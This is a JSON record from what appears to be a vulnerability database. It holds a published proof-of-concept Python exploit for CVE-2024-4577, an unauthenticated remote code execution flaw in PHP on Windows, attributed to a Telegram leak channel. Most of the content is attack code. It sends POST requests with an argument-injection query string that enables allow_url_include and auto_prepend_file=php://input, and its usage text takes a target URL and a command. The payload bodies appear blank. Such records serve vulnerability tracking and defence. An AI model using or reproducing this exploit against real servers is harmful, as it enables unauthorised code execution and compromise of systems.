{"uuid": "1843d63c-2306-4dfe-b098-5ee6cd77ee47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/leak_db2/2048", "content": "PHP &lt; 8.3.8 - Remote Code Execution (Unauthenticated) (Windows)\n\n# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)\n# Exploit Author: Yesith Alvarez\n# Vendor Homepage: https://www.php.net/downloads.php\n# Version: PHP 8.3,* &lt; 8.3.8,  8.2.*&lt;8.2.20, 8.1.*, 8.1.29\n# CVE : CVE-2024-4577\n\nfrom requests import Request, Session\nimport sys\nimport json\n\n\n\ndef title():\n    print('''\n    \n   _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______ \n  / ____\\ \\    / /  ____|  |__ \\ / _ \\__ \\| || |        | || | | ____|____  |____  |\n | |     \\ \\  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / / \n | |      \\ \\/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \\   / /    / /  \n | |____   \\  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /   \n  \\_____|   \\/   |______|  |____|\\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                              \n                                                                                                                      \n                                                                              \nAuthor: Yesith Alvarez\nGithub: https://github.com/yealvarez\nLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/\nCode improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py\n    ''')   \n\n\ndef exploit(url, command):       \n    payloads = {\n        '',\n        '' \n    }    \n    headers = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',\n    'Content-Type': 'application/x-www-form-urlencoded'}\n    s = Session()\n    for payload in payloads:\n        url = url + \"/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input\"\n        req = Request('POST', url, data=payload, headers=headers)\n        prepped = req.prepare()\n        del prepped.headers['Content-Type']\n        resp = s.send(prepped,\n        verify=False,\n        timeout=15)\n        #print(prepped.headers)\n        #print(url)\n        #print(resp.headers)       \n        #print(payload)\n        print(resp.status_code)\n        print(resp.text)\n\n\nif __name__ == '__main__':\n    title()\n    if(len(sys.argv) &lt; 2):\n        print('[+] USAGE: python3 %s https:// \\n'%(sys.argv[0]))\n        print('[+] USAGE: python3 %s https://192.168.0.10\\n dir'%(sys.argv[0]))        \n        exit(0)\n    else:\n        exploit(sys.argv[1],sys.argv[2])", "creation_timestamp": "2024-10-29T09:05:56.000000Z"}